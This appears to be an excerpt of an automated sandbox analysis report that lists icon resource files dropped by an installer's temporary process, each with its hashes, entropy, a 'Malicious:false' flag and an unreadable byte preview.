                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.066773618954921
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Ph9MjBRXLI4PPPPPPP5PPPlPPPPPvsuzWNQ:PhIl6u
                                                                                                                                                                                                                                                          MD5:2F777CE0EAAF668E63BACB213F805C72
                                                                                                                                                                                                                                                          SHA1:1200A1ACD3E1E8909738870ECA24FD3DB5E4EF4E
                                                                                                                                                                                                                                                          SHA-256:F29CE4EA22FB3C298B8B98E2600D85F76C00C81502332BDC21B6B6D4BFFFA8D1
                                                                                                                                                                                                                                                          SHA-512:5A9E8A41FC543E5AC83C1020CF503C5239D68A68228E18441FD58C560E3D19661F8B54702483984DF378B500DA09D144CD250ABB2A29742066B46E3FC9BC6F68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................m.*.k...k...l.a.m...............................................................................................................m.u.m...m...m...m...l...m.u.m...l...m...m...m...m...m...n...m.p.q.".............................................................p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...q.?.....................................................q...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...q...o.'.............................................t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...s.P.....................................u.z.v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v.w.............................y.i.y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...x.f.....................{.6.{...{...{...{...{...{...{...{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.327550606417895
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:7ok26VKvsyK8gww8d6IrU866xoQ6iekgM7F5F616mlunzNa:7hNqsyw8NxogekgS/01l2zQ
                                                                                                                                                                                                                                                          MD5:B1B0BDF79925656C6612EB420EFDD0CB
                                                                                                                                                                                                                                                          SHA1:67A7A212310C229BD3753F937FE769392719BA85
                                                                                                                                                                                                                                                          SHA-256:02FDCF85764302068222786937E5769650543F7B19B06208B65CE325792E7282
                                                                                                                                                                                                                                                          SHA-512:700EDB186443417B8B5C2FFF44AC0CA4F40492F08789A4C44818F8255E4C5082AB7388AFBEE9DBE86C3979D15FF92F6CF33ED787694470AF7B88B86BD180F01D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ........................................................................................................................................................................................................................................................................................................................................!...!........................................................................................................141.........! !.!$!Z...1...1...)...!............................................................................................RQR9....101.Z]Z.........)()s...J...9...)...!........................................................................................BEBZ............sqs.....! !....Z...J...9...).......................................................................................)141.),).............),)........s...R...B...1...!...........................................................................!...1...J..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.398174204777635
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Jast2MOHFY/G3BwkW6YvzQNUWRQi+EKbp2uDd4pWRwf2aGAXV:hwMOCGCvzCUW946dfMI
                                                                                                                                                                                                                                                          MD5:E86E5DECCF75CD251149376B2882272B
                                                                                                                                                                                                                                                          SHA1:B84C1608F2E77A4BB78D1523A679F9C74256D227
                                                                                                                                                                                                                                                          SHA-256:228AB3BBAEEA67B9B701E5F034C05E00B61739F4BB8B9256E8FA6E4AE40C74BF
                                                                                                                                                                                                                                                          SHA-512:784EB5883876810C15637C541EB036E87F0964F8A4B39CB7303B3C84EF8FC59425F7528890114B3381EEF021E992CD485A97EB4C58C5B8F5389F3114D6816C63
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................224.02;.15E614E:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:14D:15E903?*/01...................................=...H...u.......z...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x.......{...U...%>..B...........................c..%...)...+...)...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...*...*...'....u...&E......................B~.'...5...?..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A..!A...@...9...+....b.......................z..;..$D..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..$D...?...(....0F...............'....#E..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..#C..$D...:....Ed...............+.:..#E..#D..#D..#D..#D..#D..#D.."D
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.056283894172477
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:DZlab9wlipnz12qCLtZ7JgVksVScm8FPcTi:D3aJkipzZKtpJEkiBFEm
                                                                                                                                                                                                                                                          MD5:F501D67C40B9B639411C99B14F60E14D
                                                                                                                                                                                                                                                          SHA1:6F16B1384505A87848A6FB078FC3B62CC55BBF94
                                                                                                                                                                                                                                                          SHA-256:4EC7F2AB9D5FD7E5F1622F007510B4F4D3C1C779E5CDB4B128E2D53A2E468A28
                                                                                                                                                                                                                                                          SHA-512:775647B02208318CCAB7ED6873D9351ADD106D5EDF27857E73B215B18C04310693D210EB43415690D51191CDEF7F21AECED1B7FCF5A3AFB254698A9CF13AF3CF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ........................................................4...G...K...I...<...&...........................%...:...I...J...E...3...................................................7.'a..M...Z...i...e...N...C...#`....p...\...[...n..S..C...K...a...g...Z...M...,k....3.........................................R...............................e...,m..........+i..b...z...........................U...#Z..................................7.@....8....................Gp.VSY........................\co..Hz.............'...G........;.@.................................;. ....~...p...,....Sr.NAA........................................^US..S......[...A........@.0.....................................s.....8...02<.qdb....................................................../C..........~...........................................K...u.*'/.rdb..............................................................1E..y..P..............................................-.#.C67...........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.066773618954921
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Ph9MjBRXLI4PPPPPPP5PPPlPPPPPvsuzWNQ:PhIl6u
                                                                                                                                                                                                                                                          MD5:2F777CE0EAAF668E63BACB213F805C72
                                                                                                                                                                                                                                                          SHA1:1200A1ACD3E1E8909738870ECA24FD3DB5E4EF4E
                                                                                                                                                                                                                                                          SHA-256:F29CE4EA22FB3C298B8B98E2600D85F76C00C81502332BDC21B6B6D4BFFFA8D1
                                                                                                                                                                                                                                                          SHA-512:5A9E8A41FC543E5AC83C1020CF503C5239D68A68228E18441FD58C560E3D19661F8B54702483984DF378B500DA09D144CD250ABB2A29742066B46E3FC9BC6F68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................m.*.k...k...l.a.m...............................................................................................................m.u.m...m...m...m...l...m.u.m...l...m...m...m...m...m...n...m.p.q.".............................................................p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...q.?.....................................................q...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...r...q...o.'.............................................t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...t...s.P.....................................u.z.v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v...v.w.............................y.i.y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...x.f.....................{.6.{...{...{...{...{...{...{...{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.980115331909525
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:zCCCPJgo7qkfGEEEEEEEEEE1vt9COYNybhh3cGcm:O1So7qkf8zyNw33P
                                                                                                                                                                                                                                                          MD5:6447AACD6C19A9D3F0CDB2322620997A
                                                                                                                                                                                                                                                          SHA1:DECED599496691BB5403D8CAA063227181400DED
                                                                                                                                                                                                                                                          SHA-256:B5D3DDED1F4C3F75C033E19008119BC8E283DE10BBBCE39488854028C54511ED
                                                                                                                                                                                                                                                          SHA-512:91942D1C960B176BCA722CB5AF08B38A0072B789EC9E8B75236662BD69418251FBC1A30A41FD1FE0264CA34934608989AD441E728972F1E389CDB3E30F9336FF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................................................................................................................................................................................................................................................................................................................................../..?..?../............................o...................................................................................................................?.............................................................................................................?......................................o...........................................................................................................................................................................o........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.128222585880228
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:0UTeD1j0JtPPPPPPPPPPPPPPPPPPPPPPPPPPP0BU2LxHfNeQktOOh/L+1Ya2Xm5w:0UTeDrHkQeOOh/Lgf2Xm5PciHahGcymV
                                                                                                                                                                                                                                                          MD5:FE64E1FF82E7BB3030287E3EC9A1CA1F
                                                                                                                                                                                                                                                          SHA1:48B4134044934131BE1F0D78AE817B9D75142218
                                                                                                                                                                                                                                                          SHA-256:2D57537EC385D3B1663ABE0A253446F10942B536B206DF511749302173F7EDD2
                                                                                                                                                                                                                                                          SHA-512:C5DAFD99771D67DE444225E029BAC7D918434A7E1F8D46A50B9401867A720AD7409D95A644385B3924FAB0212936A32A8580BB4BF650BB7A214425C6B72ABBB7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ...................................................9...C...;...<...<...<&..<*..<,..<-..<-..<-..<-..<,..<*..<&..<...<...;...A...:...........................................=...<...=(..=s..<...<...<...<...<...<...<...<...<...<...<...<...<...<...<...<...=s..=(..=...=...........................=...>...>...=x..=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=x..>...>...=...............>...?...?...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...........?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...@...?.......@...M...@x..@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@...@y..K...@...A...A(..A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A...A(..A...A...Bs..B...B...B...B...B...B...B...B...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.865260776041573
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:KSAuCHoaNkcD71rTr/JXTL2oOJu2u/V8o52K:KJuCHHN/rTMoOJun/VJUK
                                                                                                                                                                                                                                                          MD5:340BD449C16ECBF1A7BC30C7B3AED555
                                                                                                                                                                                                                                                          SHA1:D4464A700F4A7C6CDA68BE19AE90B0526D980B33
                                                                                                                                                                                                                                                          SHA-256:01F8E1E82FDA69928E9EDA19DE2D775F4194CB8ADC081753C426456BFE2619F6
                                                                                                                                                                                                                                                          SHA-512:16807B0C2B16547397D717DDA738B69122F2C3DC6CF2DE988F8675D4F2E0B5C9592D350FF6F408F012FCB4B3822FDB5ED6CA887D311DDAED090193AFAF0826B1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ............................................................................................3...@...-...*...@...&.......................................................................................................(+...[(..m7..D...G...a1..>......<.......................................................................................'...7...D...E3...L ..V7.f)..X....>".s5.. ..z...................................................................)...0...9...A...I...O...R...S...P*..zB...n8&.c(..P...{9!.t1..4...................................................... ...E'......\...D...P...V...Y...Z...[...`...g...i!...E...v:+.T...L...p/".^...8...A..4........................................)..tI..........=...@...P...T...Y...c...j....&&0.<>J.div.....j<5.j(..C...M...Y...E...A...}..=................................=...Q...8......g...Q.......c...V...v((1.?@L.hny...............n\b.a"..O...;...H...t5..c+..L...z..$........................J..|R...4...0.......).....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.07531325717377
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:n2to4hDDD+l6ZtQE1mA/+PWLlClkKAUqjcVGTJUysHFa/IJu:2tthDDal6LL+PWQSB6sTqysHFaQJu
                                                                                                                                                                                                                                                          MD5:D0D41AD531613F51005CFDD6E7AFC134
                                                                                                                                                                                                                                                          SHA1:828A3A01B74603403798155326286743F5E4000C
                                                                                                                                                                                                                                                          SHA-256:0E43F7B2B24A035112F9FACD840EF0856F68260BA890CA1EDD7FF7B4A1DD3036
                                                                                                                                                                                                                                                          SHA-512:3471310FDE5E1341FD75B69C5271B15B385885E90A277E90F989D75638CCCA63E1E04BF4574E2610B24AC16BD0C04113EFC15E5B2A25EBC94191845BD03E8F44
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................RRR.VWW.}...ccd.ccd.~...dee.-...............................................................................................qrr.))).....................................................................................................................PRR.]__.'''.9;:.?CA.<>=.<?=.@CA.011....%uxx.............................................................................................wxw.........................NOO.................TTT.BBB.;;;.........................................JJJ.HHH.OOO=eee.TSS.ZYY+433.........`.y.E.e.F.f.Y.v.................bbb.[[Z....O.......................................................................2...........0...%...'...+...........2...4........XXX.....xxx.............................................................lll....F........1...7...8...............Y............ppp.....ccc.........................\\\.ttt.nnn.non.ddc.rrr...............
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.099397362289201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:SB5/OEO7w9J5CJDojYDgyTAU8Nazp+1RmzzVzab20B+H7YBkLviAhJySdzMVn9f:UGniUvXAdNGtzzu8ALAmS0
                                                                                                                                                                                                                                                          MD5:3236B7EE04864A464C4269EA6772C06B
                                                                                                                                                                                                                                                          SHA1:C32DAC3F987C391FAEEFB48184431669F6C2D961
                                                                                                                                                                                                                                                          SHA-256:641DB9FED269716510F749F98430FBB3563A0DDE013354CA2ECCC572E95EAF84
                                                                                                                                                                                                                                                          SHA-512:F311E36B92F5905B15E9738FE431C287253A2DDD05D5EBA758DCCD7257884D3A7990DCB6A77401C25122EAC419F68F543ACDA12BB3AABA0C790155EE84544702
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ....................................................................`.........................................................................................................................j.........`.....................................................................................................................Uw..k.........`.................................................................................................................Vw..Wx..w.........@...@...@...@...@.............................................................................................Vx..Wx..Xz..............................................@....................................................... .............Wy..Xy..Xz..X{........................................................ .......................................`.................Wy..Xz..X{..Y{..Z|..d...Z~..[~..z.........................................P...............................`...............b...Wz..X
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.636162501782274
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:L9Ma1/Da+8+n63MJPD7wVGuTsJsr1sZbol4zQvH:ZN17a+8+jlmsJsxll
                                                                                                                                                                                                                                                          MD5:0673E359F24B2E3E70DEF71FD99DCA08
                                                                                                                                                                                                                                                          SHA1:9CCFDF61774455EFA4F203A295B7CD73970381F1
                                                                                                                                                                                                                                                          SHA-256:9B2E88181222D914DF957836D7DDD48F1400CEF417C2AAF4705F399F07E4F872
                                                                                                                                                                                                                                                          SHA-512:C6178BDBCCCE71F4F92FEF31E8D5FADA4098CD5A2CF9A9593EE5A9E81CC9B878820731EE32874EF912FE816050B7A7F3DC280A2381B2BF41DEC8332BDBC98F9C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................[I.....F#...L<P................................................................................................^L..........\H..hQ.......t.................................................................................................nF9..........]I..oV..hQ.......w.........................j?6E.YKs.YJu.YJu.XJu.XJu.WIu.XIu.UGu.REu.SEu.REu.SDu.SDu.SDu.RCt.RBy.VF\.........aM..qY..oV..iR.......x......................iX..}h..j...j...j...i..~i..~h..}g..wd..vc..vb..vb..wb..wa..wa..w`..v_..v`......fQ..t[..qY..pX..jT.......z..........}......fV_.m..m..l..l..l..k..k...j..we..vd..vd..wd..wc..wb..wb..wb..wa..xb..\Ms.gS..v^..r[..rZ..qY..kU.......|.................{h..o..n..n..n..m..m..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.943764396001677
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LvIxIlvIfcPp3sOHG3cj4D0oT9wgXXXXXXDpXXXXXXDBXXXXXX5vXXXXj9FLXo4O:LvIxIlvIEx3rHb4D0WpZYO2B
                                                                                                                                                                                                                                                          MD5:0075259CD4B132A02EB69CA2D82B1021
                                                                                                                                                                                                                                                          SHA1:D0F009D16495A8480891E0BB1F4D9EF7DFC96B18
                                                                                                                                                                                                                                                          SHA-256:EF6FF1A4B4740C8BA8817D625895D36DDD386C051B798A210EA9B59F68BBAEB7
                                                                                                                                                                                                                                                          SHA-512:2803475A5F0E2B277A022DA9122B6AF5BD1EA8F663C77F39FD2EF739729721A9ADA3B27DC50F8C37B959E45E9A78F8675BB6EDE9AFE77AFCF6DBB54B8D6D3A78
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................................'...,...1...1...,...'...............................................................................................1...\.................................\...1...........................................................................6...........................................................6...........................................................(...m.................................................................m...(....................................................................................................................................................................................................sA..m9..................E...Q.................................................................(...........................b)..Z...Z...Z.......................<.................................(...........................m..........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5182
                                                                                                                                                                                                                                                          Entropy (8bit):4.429830209492408
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Rd9W4lzzzzzYXFrNmoN03g+iIsaDBYFGmGW2PD51s2ARAAR/sAye8:dW4gnJLI7DBolGW2r51dARAARRye
                                                                                                                                                                                                                                                          MD5:31B5594B3A3289FB258A4EFBAC38F230
                                                                                                                                                                                                                                                          SHA1:E41016FBE49B5B9B292EFC5C252F73452E55B409
                                                                                                                                                                                                                                                          SHA-256:3B0521E3291E2F330873A66864C3DAC163E8E5DA9D62518C4541B38A979DE7B8
                                                                                                                                                                                                                                                          SHA-512:825F05B05B7A0182B8F87AFCF12BD4FA1B4CF9712D39FCF13058BE32C11091145432273B443F955BEAABB995573252BD7006103E03645107FF434C8EFCC90EA6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .(.......(... ...@..... ....................................................................................................................................................................?...................................................*......................................................................................v.../...................o.................................o.................................................................................................................................................................................................................................j.q.W.n.T.{.d..........................l.......................................=..........i.z.c...............^.>.A...A...A...A...A...A...A...A...T.4..................................................................B...B...B...K.&.B...B...B...B...B...B...B...B...B...B...B...B...`.A...........................................................B...B...B...B...B.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.386046922758486
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:su7IUPPPPRZZZZZ+avnjxUrbbbbbbbbLB2JeFxgeaXQ0:hIUPPPPaavlUrbbbbbbbbLBoOxsXJ
                                                                                                                                                                                                                                                          MD5:5D316BF8CE58BBA7DE8943D5E8A60244
                                                                                                                                                                                                                                                          SHA1:898FCA22C2A5FDC22859FB4994BDC8105D797BC2
                                                                                                                                                                                                                                                          SHA-256:92B5DF95A623E9786D079E86264CDCF882EF6C80FA824564D584B530D50BF483
                                                                                                                                                                                                                                                          SHA-512:F7C9E47127411FAE362A2BEC2A196C4C6116350D3AF7D8E6841D7824D5F0148EA8CAEF04BC5F404BD055229EB209DED86578E3EA594EB1CCCE5219586225C904
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................................................................................................................................................................................{`.{..{..{..{..{..{..{`.........................................................................................{ .{..{..{..{..{..{..{..{..{..{..{ .............................................................................{ .{..{..{..{..{..{..{..{..{..{..{..{..{ .........................................................................{..{..{..{..{..{..{..{..{..{..{..{..{..{......................................................................ib`.ib..ib..ib..ib..ib..ib..ng..{..{..{..{..{..{..{..{`.................................................................^X..^X..^X..^X..^X..^X..^X..^X..xp..{..{..{..{..{..{..{r..YP..YP..YP..YP..YP.............................................l<8.l<
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.992992998632407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LxwRTmmd4FjFuwKqDBF2fA+O4dwvcYhEEXB7/T/B/cfGt:LxtmiFjKuP+O4dw0Wx7/7qOt
                                                                                                                                                                                                                                                          MD5:BCF4E26316979B5DA494DBEA2C92B1CB
                                                                                                                                                                                                                                                          SHA1:080339DB0B56E86428295596CED9EEBF416D050C
                                                                                                                                                                                                                                                          SHA-256:A34A7DB975EB4367B54DC7BB5BC49A6B12F12501C3BEE21D9C9093717C193999
                                                                                                                                                                                                                                                          SHA-512:D52B6394C34929C4758F7F5C3D805EDE1BED09C47F80B23E4EDA8A8A81D12763014B999F95E9FBDAE41A1C26548718B86C90C02BB0C8714B21078330B12D2B8F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ......................................................................................................................................................................................................................................................................................................................................................h?!.h?..i@.jA.jA..jA..jA..jA..jA.jA.i@..h?*.................................................................................h?...K...S...X..]...Z...S...M...K..|E..uB..i@.................................................:.Jc:.J.:.J.:.J.:.J.:.J.:.J.:.J..i@..[..o..............z..j...M..oE..d>.............................................:.J.N.b.c.y.j.}.c.u.X.i.N.a.E.W.A.R..lC..g......................{...g.yoR..wU.wjK.ziG.,ju.,kv.*fq.0t.................._...A.Q............y..i.y.c.t.n.a..uH..wM..u...............................j...........k.}.2..F...9 ...6...;...<..@@..IC.qK=.P.G.X..........{.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.3625361404350915
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:Og3bVNe49Z9LhdznJkyBVLBBHb31UOOrO2SB2NNg1F0U:53FLhBeyBlBB73134NNCWU
                                                                                                                                                                                                                                                          MD5:E1286437AA2367AE05B567CA07F7AE38
                                                                                                                                                                                                                                                          SHA1:A258C5400BBC5E28476805B4EBA278BA6D128432
                                                                                                                                                                                                                                                          SHA-256:A886A335B7FC0A8EB88120FDF43E31AC349553D3DF1D3A911E3D2DF8A530BAAD
                                                                                                                                                                                                                                                          SHA-512:E7477879F63A77A50B11D1CFFEC5ECF911A2906568FDFD1912031FAC0C2180834F5540F6EB190C43C0DA6CA52C51FF0C714C08F32C5ADF52C1FCA15EB2804595
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................................................................................................................................................................................................X<.!~V.3.W.3Z=.!................................................................................................pM.!.n.{.u..z..~...~...~...~...{..u..o.}sO.%........................................................................|U.#.t...~...........................................~...t..~W.'.............................................................m.k.~.........................................................~...n.o.....................................................u...........................................................................v..1!...........................................x...........................................~.......................................y.......................................u.u......................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
